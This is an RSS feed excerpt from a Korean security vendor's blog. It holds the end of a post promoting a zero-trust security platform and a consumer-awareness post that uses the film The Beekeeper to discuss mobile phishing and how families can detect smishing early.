&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://www.estsecurity.com/enterprise/product/alyac-zepp&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;알약 ZePP&lt;/a&gt;&lt;/b&gt;는 제로트러스트를 단순한 개념이나 유행어가 아닌, &lt;b&gt;실제 서비스 운영 환경에 적용 가능한 보안 구조&lt;/b&gt;&lt;span&gt;로 구현합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;제로트러스트, 이제는 &amp;lsquo;검토&amp;rsquo;가 아니라 &amp;lsquo;적용&amp;rsquo;의 단계!&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;다수 고객을 상대하는 서비스 환경, DaaS&amp;middot;클라우드 기반 업무 구조, 외부 접속이 일상화된 IT 환경이라면 이제 보안의 기준도 달라져야 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://www.estsecurity.com/enterprise/product/alyac-zepp&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;알약 ZePP&lt;/a&gt;는 접속을 허용하는 보안이 아니라, 접속 이후까지 검증하고 관리하는 제로트러스트 보안을 제공합니다.&lt;/b&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;제로트러스트는 더 이상 새로운 개념이 아니라, 실제 운영 환경에서 적용 여부를 고민해야 할 보안의 기준이 되고 있습니다. 특히 다수 고객을 상대하는 서비스 환경에서는 &amp;lsquo;접속을 막는 보안&amp;rsquo;이 아닌, &lt;span&gt;&lt;b&gt;접속 이후까지 지속적으로 검증하고 통제할 수 있는 구조&lt;/b&gt;&lt;/span&gt;가 필수적입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;알약 ZePP는 서비스 고객 도입망 환경에 맞춰, 사용자&amp;middot;단말&amp;middot;접근 행위 전반을 하나의 흐름으로 관리하는 제로트러스트 통합 보안 플랫폼입니다. 실제 운영 환경에서 검증된 구축 사례를 통해, 복잡한 IT 환경에서도 현실적인 보안 기준을 제시합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;서비스 환경에 최적화된 제로트러스트 보안 적용이 고민되신다면,&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;아래 도입 상담을 통해 우리 조직에 맞는 적용 방안을 확인해 보시기 바랍니다!&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;&gt;&lt;a href=&quot;https://forms.office.com/r/AvGuFtwU3V&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dc1Ee0/dJMcacIBNXA/oLyasU48EqV9vYbTZycdlK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fdc1Ee0%2FdJMcacIBNXA%2FoLyasU48EqV9vYbTZycdlK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;350&quot; height=&quot;74&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>SaaS서비스보안</category>
      <category>기업보안</category>
      <category>알약ZePP</category>
      <category>엔드포인트보안</category>
      <category>이스트시큐리티</category>
      <category>제로트러스트</category>
      <category>제로트러스트보안</category>
      <category>통합보안</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5700</guid>
      <comments>https://alyacofficialblog.tistory.com/5700#entry5700comment</comments>
      <pubDate>Tue, 13 Jan 2026 10:29:09 +0900</pubDate>
    </item>
    <item>
      <title>[영화 속 보안 이야기] 인생을 무너뜨리는 모바일 피싱의 위험성, 현실에서는 어떻게 막을까?</title>
      <link>https://alyacofficialblog.tistory.com/5699</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;보이스피싱&amp;middot;스미싱과 같은 모바일 피싱 범죄는 더 이상 특정 연령이나 일부 사람들만의 문제가 아닙니다. 택배 안내, 금융 알림, 취업 제안, 지인 사칭 메시지까지. 너무도 익숙한 일상의 메시지 하나가 가족의 삶 전체를 뒤흔드는 사례가 계속해서 발생하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;특히 문제는, 이러한 피해가 가족 중 &amp;lsquo;가장 보안에 취약한 사람&amp;rsquo;을 통해 시작되는 경우가 많다는 점입니다. 스마트폰 사용에 익숙하지 않은 부모님, 새로운 앱과 링크에 대한 경계심이 낮은 고령층, 혹은 아직 보안 개념이 충분히 자리 잡지 않은 자녀까지. 한 사람의 실수가 가족 전체의 피해로 이어지는 구조가 이미 현실이 되었습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이러한 현실을 매우 직관적으로 보여주는 작품이 바로 &lt;b&gt;영화 비키퍼(The Beekeeper, 2004)&lt;/b&gt;입니다. 통쾌한 액션 영화로 알려져 있지만, 그 중심에는 우리가 매일 마주하는 모바일 피싱과 데이터 범죄의 위험성이 자리하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1920&quot; data-origin-height=&quot;2560&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bH62u7/dJMcagKZb7f/MgdtKHrgN5jQpdcxjqYkF1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bH62u7/dJMcagKZb7f/MgdtKHrgN5jQpdcxjqYkF1/img.jpg&quot; data-alt=&quot;[이미지]The Beekeeper, 2024&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bH62u7/dJMcagKZb7f/MgdtKHrgN5jQpdcxjqYkF1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbH62u7%2FdJMcagKZb7f%2FMgdtKHrgN5jQpdcxjqYkF1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1920&quot; height=&quot;2560&quot; data-origin-width=&quot;1920&quot; data-origin-height=&quot;2560&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지]The Beekeeper, 2024&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;한 번의 실수로 시작된 이야기, 피싱 피해의 시작&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;영화 &lt;i&gt;The Beekeeper&lt;/i&gt;는 매우 현실적인 사건으로 시작됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;은퇴한 교사 엘로이즈는 피싱 범죄에 속아 자신이 관리자로 있던 자선 기금의 보유금 200만 달러를 송금하게 되고, 동시에 개인 자산까지 모두 빼앗기며 파산에 이릅니다. 평생을 성실히 살아온 교사였고, 지역 사회를 위해 자선 기금을 관리하던 인물이었지만, 단 한 번의 피싱 피해로 모든 것을 잃은 끝에 극단적인 선택을 하게 됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;엘로이즈의 농장에 세입자로 살고 있던 양봉가 '애덤 클레이'(제이슨 스타뎀)은 이 비극을 목격합니다. 그는 엘로이즈가 단순히 돈을 잃은 것이 아니라, 자신이 책임지고 있던 역할과 존엄까지 함께 무너졌다는 사실에 분노하고, 정의를 구현하기로 결심합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1200&quot; data-origin-height=&quot;673&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/z1lch/dJMcaiPvYYt/leiFwEBko69zt71LRyAJH0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/z1lch/dJMcaiPvYYt/leiFwEBko69zt71LRyAJH0/img.jpg&quot; data-alt=&quot;[이미지]The Beekeeper, 2024&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/z1lch/dJMcaiPvYYt/leiFwEBko69zt71LRyAJH0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fz1lch%2FdJMcaiPvYYt%2FleiFwEBko69zt71LRyAJH0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1200&quot; height=&quot;673&quot; data-origin-width=&quot;1200&quot; data-origin-height=&quot;673&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지]The Beekeeper, 2024&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;애덤은 과거 자신이 몸담았던 비밀 조직 &amp;lsquo;비키퍼스(Beekeepers)&amp;rsquo;에 연락합니다. 비키퍼스는 인간 정보 기밀에 특화된 조직으로, 정부의 관할권조차 초월하는 권한을 가지고 미국을 보호해 온 존재입니다. 전직 비키퍼스 요원이었던 애덤은 이 조직을 통해 얻은 정보와 네트워크를 활용해, 전 세계에서 콜센터 조직을 운영하며 대규모 신용 사기를 벌이고 있는 데릭 댄포스를 추적하기 시작합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;영화는 이후, 개인정보를 무기로 삼아 사람들의 자산과 삶을 파괴하는 거대한 피싱 산업의 실체를 하나씩 드러내며 전개됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;영화 속 설정이 현실과 닮아 있는 이유&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384083.png&quot; data-origin-width=&quot;1300&quot; data-origin-height=&quot;732&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cxfvjj/dJMcahiOB9B/IFHf8cZYrGJz0refaOOXN1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cxfvjj/dJMcahiOB9B/IFHf8cZYrGJz0refaOOXN1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cxfvjj/dJMcahiOB9B/IFHf8cZYrGJz0refaOOXN1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcxfvjj%2FdJMcahiOB9B%2FIFHf8cZYrGJz0refaOOXN1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1300&quot; height=&quot;732&quot; data-filename=&quot;Group 2034384083.png&quot; data-origin-width=&quot;1300&quot; data-origin-height=&quot;732&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이 영화의 서사가 특히 날카로운 지점은, &lt;b&gt;피해자가 &amp;lsquo;관리자&amp;rsquo;였다는 설정&lt;/b&gt;입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;엘로이즈는 단순한 개인 피해자가 아닙니다. 그녀는 자선 기금의 관리자였고, 타인의 돈과 신뢰를 책임지고 있던 사람이었습니다. 즉, 피싱 범죄는 그녀 개인의 자산뿐 아니라 그녀가 관리하던 공동체의 자산과 신뢰까지 동시에 파괴한 것입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;이러한 구조는 현실에서도 반복됩니다.&lt;/b&gt; 예를들어 &lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;부모님이 동호회 회비를 관리하고 있을 수도 있고, 가족 중 누군가는 작은 사업체의 회계나 단체 계좌를 담당하고 있을 수 있습니다. 회사에서 관리자 권한을 가진 스마트폰, 공용 인증서가 저장된 기기 역시 마찬가지입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;피싱 범죄는 더 이상 &amp;lsquo;개인만 노리는 범죄&amp;rsquo;가 아닙니다. &lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;관리자 역할을 맡은 사람, 책임이 집중된 사람, 그리고 디지털 보안에 상대적으로 취약한 사람이 가장 먼저 표적이 됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;영화 속 엘로이즈가 노려진 이유는 분명합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;신뢰를 기반으로 살아온 사람&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;경계심이 낮은 환경&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;한 번의 판단으로 큰 금액을 움직일 수 있는 위치&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이 조건은 현실에서 많은 부모님 세대와도 겹칩니다. &lt;/span&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;문제는, 이러한 위험이 발생해도 자녀나 가족은 사건이 터진 뒤에야 알게 된다는 점입니다. 영화 속에서도 엘로이즈의 피해는 사후에야 주변 사람들에게 알려집니다. 이미 돌이킬 수 없는 상태가 된 뒤였습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote style=&quot;color: #0e0e0e;&quot; data-ke-style=&quot;style1&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&amp;ldquo;만약 누군가 엘로이즈의 스마트폰에서&lt;br /&gt;위험 신호를 먼저 알아챘다면?&amp;rdquo;&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;영화 속 애덤은 직접 추적하고 응징합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;그러나 현실에서는 그런 선택지가 존재하지 않습니다. 대신 우리가 할 수 있는 것은 단 하나입니다. 문제가 벌어지기 &amp;lsquo;이전&amp;rsquo;에 가족의 위험을 알아차리는 것입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;부모님의 스마트폰에서 스미싱 문자가 탐지되는 순간,&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;관리자로 등록된 가족에게 즉시 알림이 전달된다면,&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;악성 앱이 설치되는 즉시 경고를 받고 조치할 수 있다면,&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;현실에서는 영화 속 엘로이즈와 다른 결말을 맞을 수 있을 것입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;혼자 조심해서는 더이상 막을 수 없는 모바일 피싱&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;3-2 (1).jpg&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1333&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/G1Lyc/dJMcacaJWba/ko5WcmkRFBPY1JC3RHgQY0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/G1Lyc/dJMcacaJWba/ko5WcmkRFBPY1JC3RHgQY0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/G1Lyc/dJMcacaJWba/ko5WcmkRFBPY1JC3RHgQY0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FG1Lyc%2FdJMcacaJWba%2Fko5WcmkRFBPY1JC3RHgQY0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1000&quot; height=&quot;1333&quot; data-filename=&quot;3-2 (1).jpg&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1333&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;br /&gt;영화 &lt;i&gt;The Beekeeper&lt;/i&gt;가 던지는 메시지는 명확합니다. 피싱 범죄는 개인의 부주의 문제가 아니라, 구조적인 위협이며, 그 피해는 개인을 넘어 가족과 공동체로 확장된다는 점입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;현실에서 우리는 비밀 조직도, 초법적 권한도 가질 수 없습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;하지만 최소한,&amp;nbsp;가족의 스마트폰을 함께 지켜보는 구조는 만들 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
